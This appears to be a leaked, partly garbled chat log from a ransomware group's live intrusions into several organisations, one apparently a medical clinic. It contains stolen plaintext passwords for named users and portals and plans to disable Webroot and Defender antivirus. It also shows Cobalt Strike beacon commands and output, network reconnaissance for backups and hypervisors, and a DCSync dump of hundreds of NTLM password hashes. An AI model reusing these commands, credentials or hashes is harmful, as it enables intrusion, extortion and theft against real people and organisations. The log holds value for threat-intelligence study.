this seems to be the mail from either webroot or cloudbucket, hint to all-all-servers
[X] Error triaging C:\Users\.NET v4.5\AppData\Roaming\Microsoft\Protect\S-1-5-82-271721585-897601226-2024613209-625570482-296978595\460d0a91-e4b0-4ac8-96bd-413bf84d1909 : Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex

C:\Users\egl_admin\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://itcse12000-manj08bw1e88orb4.dattoweb.com/,https://itcse12000-manj08bw1e88orb4.dattoweb.com/,1/16/2019 11:04:30 AM,13192128270776825,,

C:\Users\egl_admin\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.veeam.com/,https://login.veeam.com/,8/8/2019 1:46:59 PM,13209760019353590,,

```
```
https://my.vmware.com/web/vmware/login
stevev@egltech.net
B00b00licious
```
```
http://10.0.0.1/webui/
cisco
E7c+z~%g~KnxzsRG
```
```
http://10.0.0.52:8000/login
Administrator
7654321
```
```
http://52.44.205.233/login
Bradbeers
Bradbeers
```
```
http://52.44.205.233/login
itc-operations
itc-operations
```
```
http://10.0.0.38:801/
benr
C@KEhorse369!
```
```
https://auth.ruckuswireless.com/login
mderfler@microvisionsinc.com
M@keAMYW0rk1
```
```
https://remote.itc-us.com/rdweb/pages/en-us/login.aspx
ITC\greggh,71mpR$ 8361
rebeccav,RVT!9211
Toddd,Kamejod!21
```
```
http://itcma-mits01/,http://itcma-mits01/mitsdiscover/login.md
grantc,Fall@2021!
greggh,71mpR$ 8361
jamesn,Led$9909
jasonh,fall@ITC2020!
jasonh,Trump$2020!
```
```
http://52.44.205.233/login
benjamin-facility
benjamin-facility
```
```

``The rest of the stuff we're looking for
we'll disable the rest by hand on the servers How do we disable the rest? yes only webroot
it was theoretically) webroot you wanted to bang through gpotam only windef + webroot? disable windef and hope that webroot does not burn at startup?) what to do with armaments? on ITCMA-RDS-SVR01
BtSystem.Service.exe
DattoBackupAgent.exe
DattoProvider.exe
MsMpEng.exe
WRSA.exe under a bunch of ITCMA-FILE01
DattoBackupAgent.exe
Veeam.EndPoint.Service.exe
Veeam.EndPoint.Tray.exe ITCMA-ENG01 found besides WRSA.exe:
WRCoreService.x64.exe
WRSkyClient.x64.exe it's normal vindef on servers in general is very often disabled in processes vindefanu on some servers that it does not count then sitbelt it ... yes vindef process MsMpEng.exe like? in the tasklists wrsa.exe (webroot) wesdenu then most likely it is clean, try randomly 3-4 machines to look at the list unless the hellokveri everywhere said "I did not find anything do whatever you want do not shit yourself "good afternoon, sorry I did not say hello) *not always accurate` ``
on the dumb ones:
```
sitbelt's way of numbering is not always points, try edr_qu51B↩ceguna on otlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlng:
```
====== AntiVirus ======

Cannot enumerate antivirus. root\SecurityCenter2 WMI namespace is not available on Windows Servers

``ITCMA-ENG01
```
====== AntiVirus ======

  Engine : Webroot SecureAnywhere
  ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe
  ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : Webroot SecureAnywhere
  ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe
  ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe

  Engine : Webroot SecureAnywhere
  ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe
  ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe

``ITC-DC-SVR01
```
====== AntiVirus ======

  Engine : McAfee Endpoint Security
  ProductEXE : C:\Program Files (x86)\McAfee\Endpoint Security\Threat Prevention\AMCFG.EXE
  ReportingEXE : C:\Program Files\McAfee\Endpoint Security\Threat Prevention\mfeensppl.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
``We need to look for a place from where it is allowed to do it Yes, there is more than one, just copied from the log wrong there is more than one link at least? although still October 7 went to[ ](https://mediaeveryone.com/group/itc-us-com?msg=TBdtfjmaFkBgnNvkv) this link says that access from this place is denied or not theustarev vsphere creed does not let even their server lol, I rndmicdgeorg from who?) see what caught) we let the ``
execute-assembly /home/user/TOOLS/SharpShares.exe shares --hostlist ad_computers_names.txt
[*] Tasked beacon to run .NET program: SharpShares.exe shares --hostlist ad_computers_names.txt
[+] host called home, sent: 117883 bytes
[+] received output:
Loading hostlist from ad_computers_names.txt
[*] Parsed 20597 computer objects.

All are repeated as we need)) no other LAs? Yes, half of where you have where the admin ball is already visible sessions?) added a piece that reads from the file and not from Іdarkak?)[ ](https://mediaeveryone.com/group/snpartners-com?msg=WXExMm3N9gES3d3uu) SharpShares - I corrected it a little)[ ](https://mediaeveryone.com/group/snpartners-com?msg=6g99grAzh2vAziixR) ``
204.16.247.229
https://instwp.com
-
199.127.60.227:52742
SP7PeWVtkJcPZlbXZOSlVpK4g61drpgJlUZ
``@user9 give me your cobu by the way.
```
10.10.39.194:636
10.10.39.194:443
10.10.39.194:389
10.10.39.194:88
10.10.39.194:80
Thank you fill in the archive all the trusts + the main AD infonu since such a crash was found, it probably should ... check the rest, should I recheck?
Pinging lrhvcenter1.lrhc.local [10.10.39.194] with 32 bytes of data:
Reply from 10.10.39.194: bytes=32 time<1ms TTL=63
Reply from 10.10.39.194: bytes=32 time<1ms TTL=63
Reply from 10.10.39.194: bytes=32 time<1ms TTL=63
Reply from 10.10.39.194: bytes=32 time<1ms TTL=63

Ping statistics for 10.10.39.194:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``Is it available? We've seen this case more than once...`` It's in linux...`` It didn't go out with the script...``
>operatingSystemServicePack: Likewise Open unknown.unknown.unknown
>dNSHostName: lrhvcenter1.lrhc.local
``LRHVCENTER1 anything with processes in VM was questioned by some of the virtualization system?they are in addition to dk will be dns servers put in a separate group and then all together close this one after half an hour help colleagues close it05:32 PM tell time correct this moment when 100% loss it writes like this all that in 100% loss so habit put in brackets why is written 100% loss if it even in dns is not present? another thing `` ``
beacon> shell ping LRHVCENTER
[*] Tasked beacon to run: ping LRHVCENTER
[+] host called home, sent: 82 bytes
[+] received output:
Ping request could not find host LRHVCENTER. Please check the name and try again.

``````
LRHVCENTER UNRESOLVED UNRESOLVED DOWN

``Or is it just not visible from that scan? How do you get there? It's knocked out, it's not going to go there.``
>dNSHostName: LRH-AriaWeb.lrhc.local
>servicePrincipalName: TERMSRV/LRH-ARIAWEB
>servicePrincipalName: TERMSRV/LRH-AriaWeb.lrhc.local
>servicePrincipalName: WSMAN/LRH-AriaWeb.lrhc.local
>servicePrincipalName: WSMAN/LRH-AriaWeb
```` LRHVCENTER.lrhc.local`Indefined (100% Loss):\````
>dNSHostName: LRHCamera1.lrhc.local
>servicePrincipalName: MSSQLSvc/LRHCamera1.lrhc.local:1433
>servicePrincipalName: MSSQLSvc/LRHCamera1.lrhc.local
````LRHCAMERA1.lrhc.local`
exactly sql? why terminal? ` LRH-ARIAWEB.lrhc.local` let me see the main one) yes you have 10 pkvot in the domain all you have threw nas and stuff? status on all 3 domains? well sorting is done as a matter of fact ``
Backup:
    CPNBACKUP.lrhc.local

Hyper-v:
    LRHRECOVERY1.lrhc.local
    LRHRHRecovery2.lrhc.local

VM:
    LRHSRV2.lrhc.local
    LRHVS2.lrhc.local
    PMAPP01.lrhc.local
    OPIMAGE01.lrhc.local
``````
WINSCRIBE.lrhc.local [10.10.41.142]

In the input I do not see any backups in the trusts no backups? in the trust ffmg one server does not work, even the DA does not pass there, put the brute force all the users
 
I just pinged the servers, sorted in trusts, there are very few live servers, and no backups-nas-hypervi found
 
now sorting servers in the entrance domain, there are a lot of them and maybe get something related to virtualization or backups?
Administrator fe58579aa5762bdc2570e85dd2e0b65e:8cb7e0d1806e8bb55dee9954e2d8bdfd
beadmin aad3b435b51404eeaad3b435b51404ee:ee32e572565734a3322bbd2fd90fd750
tkadmin 378ef0f1e4545db12dca4431c6f3913d:81199155c72235ba7ee1e4b39da00702
WinScribe 48d0237d57a6a9698e5d533411003c5c:3d1a6aecc94c7ca42f1687fe84466dc3
replicadb fbfe8157f8e57933223fd1a66060b0b7:3b89729a25618c03434dc1275fe496ef
replicafs 44ca886daafb03c8223fd1a66060b0b7:128b2ae749d5c25e46fce831eca0a708
wsadmin 8e763074c3c817ef0d68d65838d6d0e5:7035c23d0d3673cec64ea326511cc547
petekuttera 329cd609db9f46ee434ed058fe278f0b:e65e7043f9e8c2321284f39e830a51ba
glendahoffa 74deea7f7a668094c9055ef02950a7db:94de31b62705ce9e325a95982e42752c
``Well, did it work? I injected it into the administrator's process, make no yoze with a direct quote token, and everything works without the token?
>dNSHostName: Winscribe.ffmg.local
>operatingSystem: Windows Server 2003
```
```
>dNSHostName: CLINIC.ffmg.local
>operatingSystem: Windows Server 2003
Is there a wine at all? with tokens it won't let kmd run
```
beacon> shell dir \\10.5.50.15\C$
[*] Tasked beacon to run: dir \\10.5.50.15\C$
[+] host called home, sent: 50 bytes
[-] could not spawn C:{\WINDOWS\system32\cmd.exe /C dir \\10.5.50.15\C$ (token): 1349
```
```
beacon> shell dir \10.5.50.2\C$
[*] Tasked beacon to run: dir \10.5.50.2\C$
[+] host called home, sent: 49 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir \\10.5.50.2\C$ (token): 1349
``Without counting the current machine, there are two live servers, total of 3/9 in the domain
```
Pinging WINSCRIBE.ffmg.local [10.5.50.15] with 32 bytes of data:
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Reply from 10.5.50.15: bytes=32 time<1ms TTL=127
Ping statistics for 10.5.50.15:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
```
Pinging CLINIC.ffmg.local [10.5.50.2] with 32 bytes of data:
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Reply from 10.5.50.2: bytes=32 time<1ms TTL=127
Ping statistics for 10.5.50.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
``````
CLINIC
CLINIC2
CLINICDC
WINDOWSUPDATE
REPLICAFS1
WINSCRIBE
REPLICA
LIGHTSPEED
CLINICDC2
``:muscle:good job backups, nasa, virtualization preparing to close 3 domains all)``pipe pulled in?
[DC] 'ffmg.local' will be the domain
[DC] 'clinicdc.ffmg.local' will be the DC server
[DC] Exporting domain 'ffmg.local'
1163 merickson 1a9beddc1916a4a37017f3ecfe38c258 544
1335 IWAM_CLINIC e19601e689bfa99443f7f4b2c92fd4cb 66080
1169 mhalvorson bf84281424e06207f752c1a4495f547a 544
1244 patacct c2f55f15067c8a66a03b9f75c85e22b5 544
1371 training d0ba34bffdc990ff4772eb5c73cf5737 66048
1447 replicafs 128b2ae749d5c25e46fce831eca0a708 66048
1256 mmoore 1d7bb4376d9960ed7faa16e01f8e3cdd 544
1482 phed 21bbac9b5bafe88b4f4d9e14b1e0f0948 512
1507 mrtg 8f1e900bcac9813b84b888c6c9247843 66048
1409 bgagner 2f3dc2e0dc1540adb4fc84e8d5ecb96a 512
1531 wsadmin 7035c23d0d3673cec64ea326511cc547 66048
1562 katrinajohnson 5b4c6335673a75f13ed948e848f00840 512
1445 drowan 600a406c2c1f2062eb9bb227bad654aa 66050
1572 bonniezimmel e907a84bfd715fb39abeb6d4a3064300 512
1151 jwilkus f049bfe885a011e816785108f613bb1d 546
1202 ohovland 38110ff938137269f2a0471a33808929 546
1168 medicaltrans e2a41cc5e882c59d66a950721675d9c1 544
1603 marilynewan 4cd06eb29cf45c53944369c960ddc84e 512
1140 dskistad c6b814406a70f8a8eff945fcb5176453 544
1411 vheifort 1726c0ed5c3ce736de4a59dcb70deac4 514
1590 katyrisbrudt 5f0f6c0018275d54e5678ab259164984 512
1426 dstrange ee8ebda55a117f1906137cd0abaec49e 514
1164 mewan 5b4c6335673a75f13ed948e848f00840 544
1585 nicoleweber ba9bae84828ea45e15c45d1e5f9e37bf 66050
1643 barbarameder fdd6105d920cb5ffbed8de6d3a16fc8c 512
1651 HP13799540225$ 7f9a157dbb26e185d79603c1e1ca552a 4096
1619 TEMP03-DRTONG$ 56cf9e5b6e91816806d38aabdf83ef51 4096
1571 drvanvalkenburg b3dc5796146168c629bd2344ba641bb1 512
1261 ssamson 31d6cfe0d16ae931b73c59d7e0c089c0 544
1214 mjnorgard 408e810859087f51940cd6d988361ff1 544
1241 petzell 3fe1968ef9446fc2dcdb7710acdf8c8e 544
1253 bschmidt 5e40fb3ca52bd24e23eced0ec3f1115e8 544
1621 datomb 5b4c6335673a75f13ed948e848f00840 512
1263 nlocsin 03433178a7d79b3d3e9ba63aa875d4fb 66082
1640 robinswanson d9e4da83ed523ab06bda61ebaa35024e 514
1193 bbaur a7855b78ea36d58bf38d64306e682f4f 546
1608 glenda2 41a0cf95ef2cd698846d4206e2150aea 512
1472 hthompson b63b839c95ddee3aa3ed0f1d7d62513a 514
2177 SOLARWINDS_WEBSITE 93a28d06a356d027669d73454161ffb3 66048
1129 bswanson 36ba05f307a2cbcc31cf0dcac9c64cb2 546
1513 shirleymeyer 602e94baa8f3a2c5761b79dec37d92ec 66050
1230 smartinson ceee8de8be2a3bdc5c1c268d76617758 546
1647 peggybrusven e1a277819ef9e34b4243230b63663ab4 514
1673 tanyahanstad 5cb4dc02e8fee91395dacf25be277d18 512
1257 preregistration 1623f25bc717c913c0e785b990835a70 546
1247 registration e4d1e951d92fe59746bb34b6c24ad72c 546
1685 carolpierce 5b4c6335673a75f13ed948e848f00840 512
1125 aellingson 7cfe1c76e6f61ee628910cd68cc6fbed 546
1648 megangriep 5b4c6335673a75f13ed948e848f00840 514
1542 kjorgens 26e3dab3479a026f9b9388cac0bb32d0 514
1679 emileehaugen 45c5a532738b9fa30a42f8ea48587bf6 514
1638 kimkugler 7cfe1c76e6f61ee628910cd68cc6fbed 514
1578 stephenlipson 0ff921941dae72d793e488f418f30b 66050
1591 kimklinger 5b4c6335673a75f13ed948e848f00840 512
1615 jdimke2 1f3b8ae8a302a7fb04680ce3f420637c 512
1726 jasoneggers 5b4c6335673a75f13ed948e848f00840 512
1289 KINETXSQL$ fe54a4823641a82d86271220e8695bbe 4096
1139 dcrintea 53b8304274902aa66b0cab35a26fccdc 544
1258 medical aa1ca0d0e5967c8942676d74d475e4 544
1697 staceylang 416a72f200b2f7da4a5abfad301665f2 512
1457 aerickson 5df827e6c35ee2e0e9f26a14d0685900 514
1518 marierund 038416de722248d4c0db0b34c68eb065 66048
1668 courtneyfrazier dd8eeaec27c155fe35e43f16f4d84168 514
1416 sverdorn da252e960b2c34e1bb1da4800bfdee2b 514
1413 pdoms 2fd2d807513f87a55d51ea76ed8f68f1 514
1412 mcasper af696aa831ce6bcadb1ac2690b8b9569 514
1415 dweinbar ec74b2b19dd7c9e4a2eb8ed7461dd780 514
1584 deelindholm 4697e64dec7e7c7b129765c00dae3a3f 66050
2128 IT01$ 9e4c21bcba9a986b90926044c408a714 4096
1740 lisameyers e8aa6d47847b8e2c99fd3cfe35f051e 512
1574 tempceo 21fb7bca2b6f3fdabff9288ad62ff1bd 514
1190 kdenker 2d782825f402ebf523ce5422c31a5227 66082
1143 gripley b0121e3d65f926674e464945aeddf1ca 544
1747 sophierussell 69be67ef02c321ac27d320769fed0bcf 512
1749 gripleytest b0121e3d65f926674e464945aeddf1ca 66048
1126 avculek c0c4c300fe507080ff5c62377b55195c 544
1750 sherrimcfarren 1abe6ca510c51de5a55a42a1231a5b81 512
1279 jmosher 426adc1fa9503d802a45be29f045dc6f 544
1418 manderson 239266bb61b6a686d84204cab036be96 512
1229 rwachlarowicz 5cac67bc64b56133a61b1af214f8c2d0 544
1681 noramelby 71c6f855b625f6b88c451a86cdb81bdb 514
1595 tamaraharthun f5ec168977a081d026c4f9645e9303e2 514
1145 ijones 6ee7580d75845d96d8baa76517f4264b 544
1705 kendradenker 2d782825f402ebf523ce5422c31a5227 512
1417 mrecords 5b4c6335673a75f13ed948e848f00840 512
1565 sherrimaanum 35291d6b63c9f4ddf70c80834ea8dfe1 514
1662 supplytemp 1532d83b4f7965e623218b86602a9e93 514
1573 webconference 5b4c6335673a75f13ed948e848f00840 66050
1666 mariahokerstrom ebca32f06ce5e64c30d3e4bef85f6080 514
1672 petekutter 7423675713fb84177d9dc6dceed6a9131 512
1742 pkutter3 d8c5e4ad038d4f40665a9b5da8bcdc0a 512
1763 helmerswenson 5b4c6335673a75f13ed948e848f00840 512
1158 lab 3e89395612d185dc77d09dc80ab4139d 544
1505 pkutter2 7423675713fb84177d9dc6dceed6a9131 512
1441 lrosin 060366f3ab4cee59cfda5dc22d9c5941 514
1479 pkutter 6208a13d22b8d3994676469e3e348c79 512
1777 WINDOWSUPDATE$ 5c8e86b8ba437559ef0d89e4139349c7 4096
1779 johnirvin 5b4c6335673a75f13ed948e848f00840 512
1781 tomhegarty 05121df3fdd96d30be27a44fcf75b5c3 512
1786 markvukonich 5b4c6335673a75f13ed948e848f00840 512
1778 phillipkellar 85ceb62376586c525f8c5a7f541753ab 512
1789 lanawhiteking 3fae0e888ec3deb796cb4f1baf59b4c5 512
1791 OUTREACH01$ 3e2a9a9a1dfb0b934c78e1372051f5a091 4096
1259 jkowitz 493f5fb81b19868e9dc354a5fa9961cd 546
1246 slarson a7564b574cfa7b683826358597a8643b 546
1659 marciakempton c79b79f7006f09c9e5efee4304608bb7 514
1611 bridgetgrenier 18a60aac5e33c62d4b919ca7f1001692 514
1658 madgecourtney e4bd7f71e68c1d26a92611cd64fa3cae 514
1407 ereger 72e926193b59892fa05353669545eb453a 514
1419 kbutler 5dbb20ff0c4d681f0ba0009ba39a0ef 514
1455 eanderson 93c6701c7cbed0e3023f9d8d40d9c8 514
1575 kimborgus 5b4c6335673a75f13ed948e848f00840 514
1219 amuxfeldt 7c0e3947902a10eb0ae30b806212c381 546
1582 deannawilliams e97080efbef8899068a2f11892ea9c85 514
1414 leleman 53a74835ef5a47c958e64fd2dde54de9 514
1694 jodeeolson b82758bd889a0f4c2bd0328789c39e23 514
1171 phokanson 27df247abba83984d992b30d26437725 546
1153 jhubbes 31caa2be4001aa2037501fe528aecf61 546
1796 davidflach 1f90d3748e7ad48d787c09c619d40139 66048
1222 pjohnson a8365c7713ff934fd450585ce45f37a6 546
1568 pattyjohnson a8365c7713ff934fd450585ce45f37a6 512
1798 TEMP06$ deeb839a9c7a5cf7f7feff6138cc4af2 4096
1549 amyneumann 5e30961fe4cf335f62de09e3470924d7 512
1818 todd.ziemke ebc2a1deef991b10154f6a1bf2479d0d 66048
1182 tmark 1613c77529e775dc94a2ca2d281791e3 544
1127 bbecker 275d29f95970d4d98f7e8a70652d8dda 544
1771 johntate dc6a9770c8ec8d065a04fd49fd16d198 512
1592 tinaeckhoff 5b4c6335673a75f13ed948e848f00840 66048
1188 wswenson a557ffd2f275dd484ee86ad2d5fc6c75 544
1546 michellelohse c23aa06230298e8b6990af4c7154e74b 512
1758 shawnellingson 1cb77b834155d1f434b90aacb8a152c9 512
1755 webinar ad4ffc7b10f3cfe742598fde57a3a94c 512
1824 bdsnaza 2222cef39d072fd5b25e330db776a4c2 512
1232 drsanderson 1fe4bfb27630ce0822ec3c88a7e8ceb6 66080
1201 dewert 5b4c6335673a75f13ed948e848f00840 544
1341 ADMIN08$ 3af095859833ed237478d8a9b78c4c59 4096
1526 ADMIN04$ 3ba870504dd9671edf26765e5855f384 4096
1368 ADMIN02$ fc18303a65a4820f2688cbbdfab90139 4096
1350 CODING11$ a9e0c63fecb1bb50c89141b4d2093dea 4096
1616 DIABETICED01$ 569931f15a10a10540782fa0f8950ae9 4096
1329 DIABETIC01$ f9c755912efa816fa15a79310696d66a 4096
1646 EKG04$ 797e43fd76855c76d4616f3d61010a8748 4096
1633 EKG03$ e1ddc8fc353e29dc037bc7e3645b9124 4096
2114 INSURANCE05$ d7d71e53dcfb92294aa1d541ead6348a 4096
1477 INUSRANCE06$ fea736b11ebc4055f3a0e9b5e7de967b 4096
1285 MEDICALTRANS11$ f7706b117bfcc4d73f6564e8c2aa6c24 4096
1291 MEDTRANST01$ fdacb7b544dbb4e57416a62d6ad4a73d 4096
1650 MEDTRANS24$ 3a1f788e7786d191ddf8cecd95ac975a 4096
1540 MEDTRANS20$ cd2d747d526cf2abad99151443e12db1 4096
1293 MEDTRANS10$ 67185a00ddc12e054d691c5b17055f1f 4096
1296 MEDTRANS09$ 1785748439ba65655268a74b1bf4cae2 4096
1298 MEDTRANS05$ 87c0adeb12992157b1bf53daa0094bb7 4096
1284 MEDTRANS04$ 5986cd130ec92a6819018b035b3e1835 4096
1297 MEDTRANS03$ 73e5241104ec35fc77a16da8729919ad 4096
1331 ENT01$ 00a3a02e678afc3f1cc1b3427c74a4a6 4096
1301 HIS03$ 9ffda8fb210a973885ed64687521799c 4096
1308 LABOFFICE$ b8350de7ce2c7d69c80516ac5c80619a 4096
2146 LAB02$ 0d71cae27bfd6ba290c2dc4dcb58a6e9 4096
1517 trishdeutschman 2bd054b019b30ef9b4d53b1a9a6eb56b 66050
1461 shalvorson 0bd704c8a12024d095fc7cbf1ed8f72f 512
1465 nanderson 2b8efcb05bd8426f5338f6a06b7f7f09 512
1463 lniesche 4ed7184a5b83f2de1ec6d23237497c0e 512
1462 dgrefe 3cad0e0f95ca6d0c60989955d794b6b1 512
1464 bzimmel f85ebe09110f73f149a7ba58be020591 512
1130 blnurse 78001de4cfef2bf1afcdb3c2a6efffd 544
1460 bwoessner 702f70098a144bfb7c7a1457556ed95c 514
1684 aprilvculek aed6234fbf01c56c16a2521831bc6e5a 512
2148 BLCTRANS05$ 68f3358b0d47feac2942b9ff49d1b312 4096
2142 BLCNURSE02$ 5547023037dc738d985c9901a5129152 4096
2151 BLCNURSE01$ 79e1363d6878871bbe36632c664f6d4a 4096
1675 IT02$ 8b4694da4e512c09194020f90701b1e6 4096
1474 WRCRECEPTION$ f868dad2f1096572c522e56ff51c575c 4096
2197 WHTRECEPTION01$ a6bb50d21fb70416b20c68717be9d02e 4096
1711 PHARMACY01$ 9bee950ff25ec085153753ea621f8b27a 4096
1570 DRVANVALKENBURG$ 9004b38c8a78c88980669b327d260436 4096
1630 DR-TOMB$ f99781df952704f664d7df5bfb929db5 4096
1772 DR-TATE$ 98a40706e695660266392c0e9dce074d 4096
2149 DR-SWENSON$ 952d302fc8aed0b6f8a825afd063705f 4096
2169 DRNORGARD-MAC$ 541b638eeb32bd344a2f4ac2f0b55d 4096
1319 DR-KOWITZ$ 3dc71cd69625a6bdee71a1fe60404245 4096
1315 DR-KALIHER$ 1d8645068fdeea15c73337c6a43be9e7 4096
2138 DRHENDELBL$ 72252fe5b2ad55cc2e608665b086eb7c 4096
1324 PLINDHOLM$ 77cdaa15e267709c302069e9a86e7869 4096
1471 sspilde 3204577732a9532bd95dcbb0539486a0 512
1469 joachs 301a1168cc69d2a4255e44e8881c7310 512
1470 ahansen 43fc73d691784a72ceaa65d9606f3592 512
1396 whtreception 9380147741154115433e6bda9436212b0e52 66048
1450 front d2a7d55bfa7a7183e69d69dfeceeda41 66048
1346 VERNON1$ 9bf548fdc3e20e1748140fa106ca4361 4096
2159 ONCOLOGY02$ 523fa53bf9e60b3445a2b0f8a39788a6 4096
1410 dschultz 8da5df4b55e013803ab1be9847bd4bc 512
1305 PATIENTINFO01$ 3594c1d47c352dfac0a77eb9465ed4be 4096
1304 PATIENTINFO03$ 83b8caa3964b05711b29951e497f46ac 4096
1803 stephanidyrhaug 38acbd84c347890bddb0b67ced9872c9 512
2170 REGPATINFO01$ f3db83ea90ce03c9d59f18b7d98e790b 4096
1536 CASHIER02$ c5ef9a634b52c1196ac1608b33862680 4098
2182 PATIENTINFO02$ c079c13edc63f38d43ff3ef83382236a 4098
2110 REGISTRATION01$ 3d7e32302558c0c4ba80e9dbaed449f5 4098
2111 CASHIER01$ 22c913392d573561c7009cc5a129fb60 4098
1374 REGISTRATION02$ 16db1ca289846dbf02ee9609c9d28a27 4098
1459 knelson 4f019a0452ee8e4a676f274fc355f954 512
2181 INSURANCE11$ f47c2c8290c79639f9710478d295587e 4096
1309 UROLOGY01$ e5b6b52c13493ae4dbdc30ddf6f51368 4096
2139 BLCRECEPTION$ 156c1ba2d682dd3d0081880e3d07b03d 4096
1211 gmathison 59cf57821c7934a345404fc8e43fcf7c 544
1394 meolson e3bdc12145b172b358940a203285570f 512
1359 ONCOLOGY01$ 331da257042cf50b8184e74c9715e8 4096
1283 kgullickson$ 66d364525032a0af2ce6ddff7608fb50 66080
1577 DR-UROLOGY$ 111e437573a1c0757e0ade030969aeb4 4096
1793 cynthiaknutson$ ba63c041662150375c627d163df382e9 66048
1799 ADMIN16$ 3b015d3d7bc1fb7f6b63ae4aa801fe1f 4098
1524 lisajohnson 77120a4a97532a21b5018f6abc150e2a 512
1492 snjos 952049408e1609b06c686c17cb85e36d 512
1567 DRVENNERSTROM$ 1bfa12f14519c91c1220e63d392fb5f5 4096
2116 PATIENTACCTS03$ 8b4b7896a8e0e190b49439d18c735352 4096
1150 jgeary f045401a5e4c75dbbe4c3b7d04de4628 544
1133 cnyberg fa82f78268095544cc4d907b7def29f1 544
1627 DR-LOKKEN$ 3b4cf9dc445a87cd539cec25725f5f08 4096
1744 fadelnammour 088b8ec27bc87547ea243690958e3ac6 512
1652 kimberlylarson 5de62f77575690f8153c9501032fc13c 512
1599 AntekBackup 105f046b8599099f367f272be28e43a4 66048
1430 INSURANCE04$ 80bf6833bd5638da8fc8d03ec2fb548c 4096
1700 aslee 0679c2a1910ce60218bba46f9b40b199 66048
1262 bmoney 7c2caf0670958ed23d938b31370f3ec5 66080
1432 PATIENTACCTS05$ 1d00af409631d12994167ef90778827f 4096
1835 mlwalvatne 88cb33147a81b3a953cd3ec488659e13 66048
1452 landerson 7a78e93cd40ffafab3827b8c26710471 66048
1451 WRC01$ 80227b83e88dcdae99f92f2f9c4b1ae0 4096
1380 hmfranklin 9610a5bd075e949b52b1fc09fb8990d9 66048
1636 dennisamundson 7f5fe8d956c5f007d34ae1dd522f06b7 512
2185 DLEMBCKE$ 27b3206db0f71451ac66fbf6409629a76 4096
1458 kleahy a1232ecb9b9e514d01cc4145e784bed4 512
2632 WRCLAB$ c55a0201fd6a6f9d8a59133edd87e375 4096
1449 back 78daf3c73c9a4aeac54ac63e56d94a59 66048
2107 FAMMEDAPPT01$ 1eea9adf3e89dd1f975ac6c1a4c6eb8f 4096
1388 mjohnson 791ef17fbef4082b078d3370c3e38ffc 512
1764 alisonnyberg 036d108a06213115050eec957305993e 512
1311 PSYCH01$ 0560f82387bb2e3cc2b0aa7ae3f7af6e 4096
1678 kathleenotte 654f2a78ba47d681510bb83c1929692a 512
1841 rlfjestad 8658e527137be2043bef77b1f109717f 66048
1842 jljerger d72bf765ff46c10a813d81509e976d99 66048
1843 kaspanswick 66ca5d9051d246da0095f9b4438abca4 66048
1845 aklarson 375faab26efb75ee4acb667202b530a8 66048
2188 UROLOGY02$ 1265e6ef43e1fb3a0b6acec8cb8d4535 4096
1788 stacywilde $7105ac60400f33e1a1fd33515a201e32 512
2150 MAINTENANCE$ 210fb141b751c90ab1732e8ab100ea50 4096
1682 ADMIN12$ cb9d235c6738afb2e1d085ec19a243a0 4098
1334 IUSR_CLINIC c6fa98673090d4b7e1d5afb35e9bee8d 66080
1822 larandadrechsel fe33f0e2f0dea6137c269af5bdb8471e 512
1427 dcavazos eac9df0d9f41f7a5c8b54b2df6d0033b 512
2140 INTERNALMED91$ 0a60ac715991b17cb43f7ef90b83343b 4096
2633 arquispe 1f1f42fa606ef8651fa159af91410632 66048
1494 troers f6e3d88419421ff66c998f847ce10122 512
1354 INSURANCE09$ da29f0e0c41ed98c6974c192e77455d9 4096
1523 jerimitchell a49567804cf6c815185339671d65fbb2 512
1522 JERIMITCHELL$ 37eecd83535b58b58e8954d53f602682 4096
1128 bpetersen c1528d77dab8f3314e34945e2a721661 66080
1226 lroehl cc3539f01f68edcf34511c40a5fd56c7 544
1337 ORTHO01OLD$ 8fe2067e26962a88a041b2cffe983c90 4096
1433 PATIENTACCTS04$ 8bd0fcfcf11735a798af4bc21aaf0e4f 4096
1431 PATIENTACCTS01$ 19ce274cf766487cd70249becde7c895 4096
1566 robertvennerstrom 9f184706e86e497fcbb3e9ba4768914d 512
1313 PATIENTACCOUNTS$ 747d92bb686ef860aca8b48a022b2cfa 4096
1837 mlohren 34d77bde8b4e251be614b7915a632a8b 66048
1227 lobowa af1766a8045f8b8b14e34927e05f21560e 544
1249 jandrews 8a20c0bb05fc9cca4996a9fd5ff72476 544
2141 DR-HORAK$ 71390b7c47471298bec922208ae47ab1 4096
2203 cmjorud 74cb2e5e4ba7b180260a1c839c9ae69b 66048
2204 arbranstad 2d9e0d2b6fef04bba4a3daab32e4232d 66048
1529 jhorak 71e77db8a282c6c55d44abb6f9c0a054 66048
1698 drmahale f39f527fb825f6ea3c93e9b0c2d7bc9f 512
1466 kbjohnson c1a593239afbce6cfe1d806758533ea9 512
1519 cherylmostue 0dbcfe529e464fd8f767eb082b2dd424 66048
1512 loiskelm 8f37fd56564f1ec544e6b2f2948bfb41 512
1737 DR-MATHISON$ 89ddc588738d1540ec04cdbbc98c1417 4096
